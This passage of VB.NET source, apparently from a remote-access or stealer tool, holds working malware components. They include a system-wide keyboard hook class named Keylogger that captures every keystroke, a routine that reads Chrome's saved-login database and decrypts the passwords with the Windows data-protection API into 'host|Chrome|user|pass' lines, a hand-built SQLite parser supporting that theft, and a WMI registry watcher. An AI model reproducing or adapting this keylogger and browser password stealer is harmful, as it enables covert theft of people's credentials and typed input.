1423. End Class
1424.  
1425. Public Class Keylogger
1426. Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal Hook As Integer, ByVal KeyDelegate As KDel, ByVal HMod As Integer, ByVal ThreadId As Integer) As Integer
1427. Private Declare Function CallNextHookEx Lib "user32" (ByVal Hook As Integer, ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1428. Private Declare Function UnhookWindowsHookEx Lib "user32" Alias "UnhookWindowsHookEx" (ByVal Hook As Integer) As Integer
1429. Private Delegate Function KDel(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1430. Public Shared Event Down(ByVal Key As String)
1431. Public Shared Event Up(ByVal Key As String)
1432. Private Shared Key As Integer
1433. Private Shared KHD As KDel
1434. Private Structure KeyStructure : Public Code As Integer : Public ScanCode As Integer : Public Flags As Integer : Public Time As Integer : Public ExtraInfo As Integer : End Structure
1435. Public Sub CreateHook()
1436. KHD = New KDel(AddressOf Proc)
1437. Key = SetWindowsHookEx(13, KHD, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0)
1438. End Sub
1439.  
1440. Private Function Proc(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1441. If (Code = 0) Then
1442. Select Case wParam
1443. Case &H100, &H104 : RaiseEvent Down(Feed(CType(lParam.Code, Keys)))
1444. Case &H101, &H105 : RaiseEvent Up(Feed(CType(lParam.Code, Keys)))
1445. End Select
1446. End If
1447. Return CallNextHookEx(Key, Code, wParam, lParam)
1448. End Function
1449. Public Sub DiposeHook()
1450. UnhookWindowsHookEx(Key)
1451. MyBase.Finalize()
1452. End Sub
1453. Private Function Feed(ByVal e As Keys) As String
1454. Select Case e
1455. Case 65 To 90
1456. If Control.IsKeyLocked(Keys.CapsLock) Or (Control.ModifierKeys And Keys.Shift) <> 0 Then
1457. Return e.ToString
1458. Else
1459. Return e.ToString.ToLower
1460. End If
1461. Case 48 To 57
1462. If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1463. Select Case e.ToString
1464. Case "D1" : Return "!"
1465. Case "D2" : Return "@"
1466. Case "D3" : Return "#"
1467. Case "D4" : Return "$"
1468. Case "D5" : Return "%"
1469. Case "D6" : Return "^"
1470. Case "D7" : Return "&"
1471. Case "D8" : Return "*"
1472. Case "D9" : Return "("
1473. Case "D0" : Return ")"
1474. End Select
1475. Else
1476. Return e.ToString.Replace("D", Nothing)
1477. End If
1478. Case 96 To 105
1479. Return e.ToString.Replace("NumPad", Nothing)
1480. Case 106 To 111
1481. Select Case e.ToString
1482. Case "Divide" : Return "/"
1483. Case "Multiply" : Return "*"
1484. Case "Subtract" : Return "-"
1485. Case "Add" : Return "+"
1486. Case "Decimal" : Return "."
1487. End Select
1488. Case 32
1489. Return " "
1490. Case 186 To 222
1491. If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1492. Select Case e.ToString
1493. Case "OemMinus" : Return "_"
1494. Case "Oemplus" : Return "+"
1495. Case "OemOpenBrackets" : Return "{"
1496. Case "Oem6" : Return "}"
1497. Case "Oem5" : Return "|"
1498. Case "Oem1" : Return ":"
1499. Case "Oem7" : Return """"
1500. Case "Oemcomma" : Return "<"
1501. Case "OemPeriod" : Return ">"
1502. Case "OemQuestion" : Return "?"
1503. Case "Oemtilde" : Return "~"
1504. End Select
1505. Else
1506. Select Case e.ToString
1507. Case "OemMinus" : Return "-"
1508. Case "Oemplus" : Return "="
1509. Case "OemOpenBrackets" : Return "["
1510. Case "Oem6" : Return "]"
1511. Case "Oem5" : Return "\"
1512. Case "Oem1" : Return ";"
1513. Case "Oem7" : Return "'"
1514. Case "Oemcomma" : Return ","
1515. Case "OemPeriod" : Return "."
1516. Case "OemQuestion" : Return "/"
1517. Case "Oemtilde" : Return "`"
1518. End Select
1519. End If
1520. Case Keys.Return
1521. Return Environment.NewLine
1522. Case Else
1523. Return "<" + e.ToString + ">"
1524. End Select
1525. Return Nothing
1526. End Function
1527. End Class
1528. Module Main
1529. Dim text As String
1530. <DllImport("Crypt32.dll", SetLastError:=True, CharSet:=System.Runtime.InteropServices.CharSet.Auto)> _
1531. Private Function CryptUnprotectData(ByRef pDataIn As DATA_BLOB, ByVal szDataDescr As String, ByRef pOptionalEntropy As DATA_BLOB, ByVal pvReserved As IntPtr, ByRef pPromptStruct As CRYPTPROTECT_PROMPTSTRUCT, ByVal dwFlags As Integer, ByRef pDataOut As DATA_BLOB) As Boolean
1532. End Function
1533. Public Sub GetChrome()
1534. Dim datapath As String = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login Data"
1535.  
1536. Try
1537. Dim SQLDatabase As Object = New SQLiteHandler(datapath)
1538. SQLDatabase.ReadTable("logins")
1539.  
1540. If File.Exists(datapath) Then
1541.  
1542. Dim host As String
1543. Dim User As String
1544. Dim pass As String
1545.  
1546. For i As Integer = 0 To SQLDatabase.GetRowCount() - 1 Step 1
1547. host = SQLDatabase.GetValue(i, "origin_url")
1548. User = SQLDatabase.GetValue(i, "username_value")
1549. pass = Decrypt(System.Text.Encoding.Default.GetBytes(SQLDatabase.GetValue(i, "password_value")))
1550.  
1551. If (User <> "") And (pass <> "") Then
1552.  
1553. text += host & "|Chrome|" & User & "|" & pass & vbCrLf
1554.  
1555. End If
1556. Next
1557. End If
1558. Catch
1559. End Try
1560. End Sub
1561. Public Function lol() As String
1562. Return text
1563. End Function
1564. <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure CRYPTPROTECT_PROMPTSTRUCT
1565. Public cbSize As Integer
1566. Public dwPromptFlags As CryptProtectPromptFlags
1567. Public hwndApp As IntPtr
1568. Public szPrompt As String
1569. End Structure
1570. <Flags()> Enum CryptProtectPromptFlags
1571. CRYPTPROTECT_PROMPT_ON_UNPROTECT = &H1
1572. CRYPTPROTECT_PROMPT_ON_PROTECT = &H2
1573. End Enum
1574. Function Decrypt(ByVal Datas() As Byte) As String
1575. Dim inj, Ors As New DATA_BLOB
1576. Dim Ghandle As GCHandle = GCHandle.Alloc(Datas, GCHandleType.Pinned)
1577. inj.pbData = Ghandle.AddrOfPinnedObject()
1578. inj.cbData = Datas.Length
1579. Ghandle.Free()
1580. CryptUnprotectData(inj, Nothing, Nothing, Nothing, Nothing, 0, Ors)
1581. Dim Returned() As Byte = New Byte(Ors.cbData) {}
1582. Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData)
1583. Dim TheString As String = Encoding.Default.GetString(Returned)
1584. Return TheString.Substring(0, TheString.Length - 1)
1585. End Function
1586. <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure DATA_BLOB
1587. Public cbData As Integer
1588. Public pbData As IntPtr
1589. End Structure
1590. End Module
1591. Public Class SQLiteHandler
1592. Private db_bytes() As Byte
1593. Private page_size As UInt16
1594. Private encoding As UInt64
1595. Private master_table_entries() As sqlite_master_entry
1596.  
1597. Private SQLDataTypeSize() As Byte = New Byte() {0, 1, 2, 3, 4, 6, 8, 8, 0, 0}
1598. Private table_entries() As table_entry
1599. Private field_names() As String
1600.  
1601. Private Structure record_header_field
1602. Dim size As Int64
1603. Dim type As Int64
1604. End Structure
1605.  
1606. Private Structure table_entry
1607. Dim row_id As Int64
1608. Dim content() As String
1609. End Structure
1610.  
1611. Private Structure sqlite_master_entry
1612. Dim row_id As Int64
1613. Dim item_type As String
1614. Dim item_name As String
1615. Dim astable_name As String
1616. Dim root_num As Int64
1617. Dim sql_statement As String
1618. End Structure
1619.  
1620. Private Function GVL(ByVal startIndex As Integer) As Integer
1621. If startIndex > db_bytes.Length Then Return Nothing
1622.  
1623. For i As Integer = startIndex To startIndex + 8 Step 1
1624. If i > db_bytes.Length - 1 Then
1625. Return Nothing
1626. ElseIf (db_bytes(i) And &H80) <> &H80 Then
1627. Return i
1628. End If
1629. Next
1630.  
1631. Return startIndex + 8
1632. End Function
1633.  
1634. Private Function CVL(ByVal startIndex As Integer, ByVal endIndex As Integer) As Int64
1635. endIndex = endIndex + 1
1636.  
1637. Dim retus(7) As Byte
1638. Dim Length As Object = endIndex - startIndex
1639. Dim Bit64 As Boolean = False
1640.  
1641. If Length = 0 Or Length > 9 Then Return Nothing
1642. If Length = 1 Then
1643. retus(0) = (db_bytes(startIndex) And &H7F)
1644. Return BitConverter.ToInt64(retus, 0)
1645. End If
1646.  
1647. If Length = 9 Then
1648. Bit64 = True
1649. End If
1650.  
1651. Dim j As Integer = 1
1652. Dim k As Integer = 7
1653. Dim y As Integer = 0
1654.  
1655. If Bit64 Then
1656. retus(0) = db_bytes(endIndex - 1)
1657. endIndex = endIndex - 1
1658. y = 1
1659. End If
1660.  
1661. For i As Integer = (endIndex - 1) To startIndex Step -1
1662. If (i - 1) >= startIndex Then
1663. retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j)) Or (db_bytes(i - 1) << k)
1664. j = j + 1
1665. y = y + 1
1666. k = k - 1
1667. Else
1668. If Not Bit64 Then retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j))
1669. End If
1670. Next
1671.  
1672. Return BitConverter.ToInt64(retus, 0)
1673. End Function
1674.  
1675. Private Function IsOdd(ByVal value As Int64) As Boolean
1676. Return (value And 1) = 1
1677. End Function
1678.  
1679. Private Function ConvertToInteger(ByVal startIndex As Integer, ByVal Size As Integer) As UInt64
1680. If Size > 8 Or Size = 0 Then Return Nothing
1681.  
1682. Dim retVal As UInt64 = 0
1683.  
1684. For i As Integer = 0 To Size - 1 Step 1
1685. retVal = ((retVal << 8) Or db_bytes(startIndex + i))
1686. Next
1687.  
1688. Return retVal
1689. End Function
1690.  
1691. Private Sub ReadMasterTable(ByVal Offset As UInt64)
1692.  
1693. If db_bytes(Offset) = &HD Then
1694.  
1695. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1696. Dim ol As Integer = 0
1697.  
1698. If Not master_table_entries Is Nothing Then
1699. ol = master_table_entries.Length
1700. ReDim Preserve master_table_entries(master_table_entries.Length + Length)
1701. Else
1702. ReDim master_table_entries(Length)
1703. End If
1704.  
1705. Dim ent_offset As UInt64
1706.  
1707. For i As Integer = 0 To Length Step 1
1708. ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1709.  
1710. If Offset <> 100 Then ent_offset = ent_offset + Offset
1711.  
1712. Dim t As Object = GVL(ent_offset)
1713. Dim size As Int64 = CVL(ent_offset, t)
1714.  
1715. Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1716. master_table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1717.  
1718. ent_offset = ent_offset + (s - ent_offset) + 1
1719.  
1720. t = GVL(ent_offset)
1721. s = t
1722. Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1723.  
1724. Dim Field_Size(4) As Int64
1725.  
1726. For j As Integer = 0 To 4 Step 1
1727. t = s + 1
1728. s = GVL(t)
1729. Field_Size(j) = CVL(t, s)
1730.  
1731. If Field_Size(j) > 9 Then
1732. If IsOdd(Field_Size(j)) Then
1733. Field_Size(j) = (Field_Size(j) - 13) / 2
1734. Else
1735. Field_Size(j) = (Field_Size(j) - 12) / 2
1736. End If
1737. Else
1738. Field_Size(j) = SQLDataTypeSize(Field_Size(j))
1739. End If
1740. Next
1741.  
1742. If encoding = 1 Then
1743. master_table_entries(ol + i).item_type = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1744. ElseIf encoding = 2 Then
1745. master_table_entries(ol + i).item_type = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1746. ElseIf encoding = 3 Then
1747. master_table_entries(ol + i).item_type = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1748. End If
1749. If encoding = 1 Then
1750. master_table_entries(ol + i).item_name = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1751. ElseIf encoding = 2 Then
1752. master_table_entries(ol + i).item_name = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1753. ElseIf encoding = 3 Then
1754. master_table_entries(ol + i).item_name = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1755. End If
1756. master_table_entries(ol + i).root_num = ConvertToInteger(ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2), Field_Size(3))
1757. If encoding = 1 Then
1758. master_table_entries(ol + i).sql_statement = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1759. ElseIf encoding = 2 Then
1760. master_table_entries(ol + i).sql_statement = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1761. ElseIf encoding = 3 Then
1762. master_table_entries(ol + i).sql_statement = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1763. End If
1764. Next
1765. ElseIf db_bytes(Offset) = &H5 Then
1766. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1767. Dim ent_offset As UInt16
1768.  
1769. For i As Integer = 0 To Length Step 1
1770. ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
1771.  
1772. If Offset = 100 Then
1773. ReadMasterTable((ConvertToInteger(ent_offset, 4) - 1) * page_size)
1774. Else
1775. ReadMasterTable((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
1776. End If
1777.  
1778. Next
1779.  
1780. ReadMasterTable((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
1781. End If
1782. End Sub
1783.  
1784. Private Function ReadTableFromOffset(ByVal Offset As UInt64) As Boolean
1785. If db_bytes(Offset) = &HD Then
1786.  
1787. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1788. Dim ol As Integer = 0
1789.  
1790. If Not table_entries Is Nothing Then
1791. ol = table_entries.Length
1792. ReDim Preserve table_entries(table_entries.Length + Length)
1793. Else
1794. ReDim table_entries(Length)
1795. End If
1796.  
1797. Dim ent_offset As UInt64
1798.  
1799. For i As Integer = 0 To Length Step 1
1800. ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1801.  
1802. If Offset <> 100 Then ent_offset = ent_offset + Offset
1803.  
1804. Dim t As Object = GVL(ent_offset)
1805. Dim size As Int64 = CVL(ent_offset, t)
1806.  
1807. Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1808. table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1809.  
1810. ent_offset = ent_offset + (s - ent_offset) + 1
1811.  
1812. t = GVL(ent_offset)
1813. s = t
1814. Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1815.  
1816. Dim Field_Size() As record_header_field = Nothing
1817. Dim size_read As Int64 = (ent_offset - t) + 1
1818. Dim j As Object = 0
1819.  
1820. While size_read < Rec_Header_Size
1821. ReDim Preserve Field_Size(j)
1822.  
1823. t = s + 1
1824. s = GVL(t)
1825. Field_Size(j).type = CVL(t, s)
1826.  
1827. If Field_Size(j).type > 9 Then
1828. If IsOdd(Field_Size(j).type) Then
1829. Field_Size(j).size = (Field_Size(j).type - 13) / 2
1830. Else
1831. Field_Size(j).size = (Field_Size(j).type - 12) / 2
1832. End If
1833. Else
1834. Field_Size(j).size = SQLDataTypeSize(Field_Size(j).type)
1835. End If
1836.  
1837. size_read = size_read + (s - t) + 1
1838. j = j + 1
1839. End While
1840.  
1841. ReDim table_entries(ol + i).content(Field_Size.Length - 1)
1842. Dim counter As Integer = 0
1843.  
1844. For k As Integer = 0 To Field_Size.Length - 1 Step 1
1845. If Field_Size(k).type > 9 Then
1846. If Not IsOdd(Field_Size(k).type) Then
1847. If encoding = 1 Then
1848. table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1849. ElseIf encoding = 2 Then
1850. table_entries(ol + i).content(k) = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1851. ElseIf encoding = 3 Then
1852. table_entries(ol + i).content(k) = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1853. End If
1854. Else
1855. table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1856. End If
1857. Else
1858. table_entries(ol + i).content(k) = CStr(ConvertToInteger(ent_offset + Rec_Header_Size + counter, Field_Size(k).size))
1859. End If
1860.  
1861. counter = counter + Field_Size(k).size
1862. Next
1863. Next
1864. ElseIf db_bytes(Offset) = &H5 Then
1865. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1866. Dim ent_offset As UInt16
1867.  
1868. For i As Integer = 0 To Length Step 1
1869. ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
1870.  
1871. ReadTableFromOffset((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
1872. Next
1873.  
1874. ReadTableFromOffset((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
1875. End If
1876.  
1877. Return True
1878. End Function
1879.  
1880. Public Function ReadTable(ByVal TableName As String) As Boolean
1881.  
1882. Dim found As Integer = -1
1883.  
1884. For i As Integer = 0 To master_table_entries.Length Step 1
1885. If master_table_entries(i).item_name.ToLower().CompareTo(TableName.ToLower()) = 0 Then
1886. found = i
1887. Exit For
1888. End If
1889. Next
1890.  
1891. If found = -1 Then Return False
1892.  
1893. Dim fields() As Object = master_table_entries(found).sql_statement.Substring(master_table_entries(found).sql_statement.IndexOf("(") + 1).Split(",")
1894.  
1895. For i As Integer = 0 To fields.Length - 1 Step 1
1896. fields(i) = LTrim(fields(i))
1897.  
1898. Dim index As Object = fields(i).IndexOf(" ")
1899.  
1900. If index > 0 Then fields(i) = fields(i).Substring(0, index)
1901.  
1902. If fields(i).IndexOf("UNIQUE") = 0 Then
1903. Exit For
1904. Else
1905. ReDim Preserve field_names(i)
1906. field_names(i) = fields(i)
1907. End If
1908. Next
1909.  
1910. Return ReadTableFromOffset((master_table_entries(found).root_num - 1) * page_size)
1911. End Function
1912.  
1913. Public Function GetRowCount() As Integer
1914. Return table_entries.Length
1915. End Function
1916.  
1917. Public Function GetValue(ByVal row_num As Integer, ByVal field As Integer) As String
1918. If row_num >= table_entries.Length Then Return Nothing
1919. If field >= table_entries(row_num).content.Length Then Return Nothing
1920.  
1921. Return table_entries(row_num).content(field)
1922. End Function
1923.  
1924. Public Function GetValue(ByVal row_num As Integer, ByVal field As String) As String
1925. Dim found As Integer = -1
1926.  
1927. For i As Integer = 0 To field_names.Length Step 1
1928. If field_names(i).ToLower().CompareTo(field.ToLower()) = 0 Then
1929. found = i
1930. Exit For
1931. End If
1932. Next
1933.  
1934. If found = -1 Then Return Nothing
1935.  
1936. Return GetValue(row_num, found)
1937. End Function
1938.  
1939. Public Function GetTableNames() As String()
1940. Dim retVal As String() = Nothing
1941. Dim arr As Object = 0
1942.  
1943. For i As Integer = 0 To master_table_entries.Length - 1 Step 1
1944. If master_table_entries(i).item_type = "table" Then
1945. ReDim Preserve retVal(arr)
1946. retVal(arr) = master_table_entries(i).item_name
1947. arr = arr + 1
1948. End If
1949. Next
1950.  
1951. Return retVal
1952. End Function
1953.  
1954. Public Sub New(ByVal baseName As String)
1955. If File.Exists(baseName) Then
1956. FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
1957. Dim asi As String = Space(LOF(1))
1958. FileGet(1, asi)
1959. FileClose(1)
1960.  
1961. db_bytes = System.Text.Encoding.Default.GetBytes(asi)
1962.  
1963. If System.Text.Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") <> 0 Then
1964. Throw New Exception("Not a valid SQLite 3 Database File")
1965. End
1966. End If
1967.  
1968. If db_bytes(52) <> 0 Then
1969. Throw New Exception("Auto-vacuum capable database is not supported")
1970. End
1971. ElseIf ConvertToInteger(44, 4) >= 4 Then
1972. Throw New Exception("No supported Schema layer file-format")
1973. End
1974. End If
1975.  
1976. page_size = ConvertToInteger(16, 2)
1977. encoding = ConvertToInteger(56, 4)
1978.  
1979. If encoding = 0 Then encoding = 1
1980.  
1981. ReadMasterTable(100)
1982. End If
1983. End Sub
1984. End Class
1985.  
1986.  
1987. Public Class RegistryWatcher
1988. Public MonitorCollection As New Collections.Generic.Dictionary(Of String, Monitor)
1989. Public Event RegistryChanged(ByVal M As Monitor)
1990. Public Enum HKEY_ROOTS As Integer
1991. HKEY_CLASSES_ROOT = 0
1992. HKEY_CURRENT_USER = 1
1993. HKEY_LOCAL_MACHINE = 2
1994. HKEY_USERS = 3
1995. HKEY_CURRENT_CONFIG = 4
1996. End Enum
1997. Public Sub AddWatcher(ByVal Root As HKEY_ROOTS, ByVal Path As String, ByVal ID As String, Optional ByVal Value As String = "")
1998. If MonitorCollection.ContainsKey(ID) = False Then
1999. Dim RegMon As New Monitor(Root, Path, ID, Value)
2000. AddHandler RegMon.Changed, AddressOf OnRegistryChanged
2001. MonitorCollection.Add(ID, RegMon)
2002. End If
2003. End Sub
2004. Public Sub RemoveWatcher(ByVal ID As String)
2005. If MonitorCollection.ContainsKey(ID) = True Then
2006. MonitorCollection(ID).StopWatch()
2007. MonitorCollection.Remove(ID)
2008. End If
2009. End Sub
2010. Private Sub OnRegistryChanged(ByVal M As Monitor)
2011. RaiseEvent RegistryChanged(M)
2012. End Sub
2013. Public Class Monitor
2014. Private mRoot As HKEY_ROOTS
2015. Private mPath As String
2016. Private mID As String
2017. Private mValue As String
2018. Private mStop As Boolean
2019. Public ReadOnly Property Root() As HKEY_ROOTS
2020. Get
2021. Return mRoot
2022. End Get
2023. End Property
2024. Public ReadOnly Property Path() As String
2025. Get
2026. Return mPath
2027. End Get
2028. End Property
2029. Public ReadOnly Property ID() As String
2030. Get
2031. Return mID
2032. End Get
2033. End Property
2034. Public ReadOnly Property Value() As String
2035. Get
2036. Return mValue
2037. End Get
2038. End Property
2039. Public Event Changed(ByVal M As Monitor)
2040. Sub New(ByVal NewRoot As HKEY_ROOTS, ByVal NewPath As String, ByVal NewID As String, ByVal NewValue As String)
2041. mRoot = NewRoot
2042. mPath = NewPath
2043. mID = NewID
2044. mValue = NewValue
2045.  
2046. Dim T As New Threading.Thread(AddressOf Watcher)
2047. T.Start()
2048. End Sub
2049. Public Sub StopWatch()
2050. mStop = True
2051. End Sub
2052. Private Sub Watcher()
2053. Dim WMIObject As Object
2054. Dim WMIEvent As Object
2055. Dim WMICurrEvent As Object
2056.  
2057. mPath = Replace(mPath, "\", "\\")
2058.  
2059. WMIObject = GetObject("winmgmts:\\.\root\default")
2060.  
2061. If mValue = "" Then
2062. WMIEvent = WMIObject.ExecNotificationQuery( _
2063. "SELECT * FROM RegistryKeyChangeEvent WHERE Hive='" & _
2064. mRoot.ToString & "' AND " & "KeyPath='" & mPath & "'")
2065. Else
2066. WMIEvent = WMIObject.ExecNotificationQuery( _
2067. "SELECT * FROM RegistryValueChangeEvent WHERE Hive='" & _
2068. mRoot.ToString & "' AND " & "KeyPath='" & mPath & "' AND ValueName='" & mValue & "'")
2069. End If
2070.  
2071. Do
2072. Try
2073. If mStop = True Then
2074. mStop = False
2075. Exit Sub
2076. End If
2077. WMICurrEvent = WMIEvent.NextEvent(500)
2078. RaiseEvent Changed(Me)
2079. Catch ex As Exception
2080. End Try
2081. Loop
2082. End Sub
2083. End Class
2084. End Class
2085. End Namespace